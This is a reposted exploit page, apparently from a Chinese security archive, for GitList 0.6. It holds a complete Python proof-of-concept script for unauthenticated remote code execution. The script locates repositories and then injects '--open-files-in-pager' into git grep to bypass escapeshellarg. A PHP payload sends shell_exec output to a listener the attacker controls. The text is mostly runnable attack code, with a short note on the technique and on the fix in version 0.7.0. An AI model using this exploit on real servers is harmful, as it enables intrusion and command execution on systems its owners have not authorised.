首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 GitList 0.6 - Unauthenticated Remote Code Execution 来源：https://security.szurek.pl/ 作者：Szurek 发布时间：2018-04-27   ''' # Exploit Title: GitList 0.6 Unauthenticated RCE # Date: 25-04-2018 # Software Link: https://github.com/klaussilveira/gitlist # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: remote    1. Description   Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`.   More info about this technique:   https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html   2. Proof of Concept '''   import requests from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import urlparse import urllib import threading import time import os import re   url = 'http://192.168.1.1/gitlist/' command = 'id' your_ip = '192.168.1.100' your_port = 8001   print "GitList 0.6 Unauthenticated RCE" print "by Kacper Szurek" print "https://security.szurek.pl/"   print "REMEMBER TO DISABLE FIREWALL"   search_url = None r = requests.get(url) repos = re.findall(r'/([^/]+)/master/rss', r.text)   if len(repos) == 0:     print "[-] No repos"     os._exit(0)   for repo in repos:     print "[+] Found repo {}".format(repo)     r = requests.get("{}{}".format(url, repo))     files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text)     for file in files:         r = requests.get("{}{}/raw/master/{}".format(url, repo, file))         print "[+] Found file {}".format(file)         print r.text[0:100]         search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1])               break   if not search_url:     print "[-] No files in repo"     os._exit(0)   print "[+] Search using {}".format(search_url)   class GetHandler(BaseHTTPRequestHandler):     def do_GET(self):         parsed_path = urlparse.urlparse(self.path)         print "[+] Command response"         print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:]         self.send_response(200)         self.end_headers()         self.wfile.write("OK")         os._exit(0)       def log_message(self, format, *args):         return   def exploit_server():     server = HTTPServer((your_ip, your_port), GetHandler)     server.serve_forever()   print "[+] Start server on {}:{}".format(your_ip, your_port) t = threading.Thread(target=exploit_server) t.daemon = True t.start() print "[+] Server started"   r  = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http://{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)})   while True:     time.sleep(1)   ''' 3. Solution:   Update to version 0.7.0   https://github.com/klaussilveira/gitlist/releases/tag/0.7.0 '''   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SickRage < v2018.03.09 - Clear ·Allok AVI to DVD SVCD VCD Conv ·Chrome V8 JIT - Arrow Function ·Drupal Drupalgeddon 2 Forms AP ·Chrome V8 JIT - 'AwaitedPromis ·osCommerce Installer Unauthent ·VMware Workstation 12.5.2 - Dr ·Oracle Weblogic Server 10.3.6. ·Easy File Sharing Web Server 7 ·Drupal < 7.58 - 'Drupalgeddon3 ·Allok Video to DVD Burner 2.6. ·Navicat < 12.0.27 - Oracle Con   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved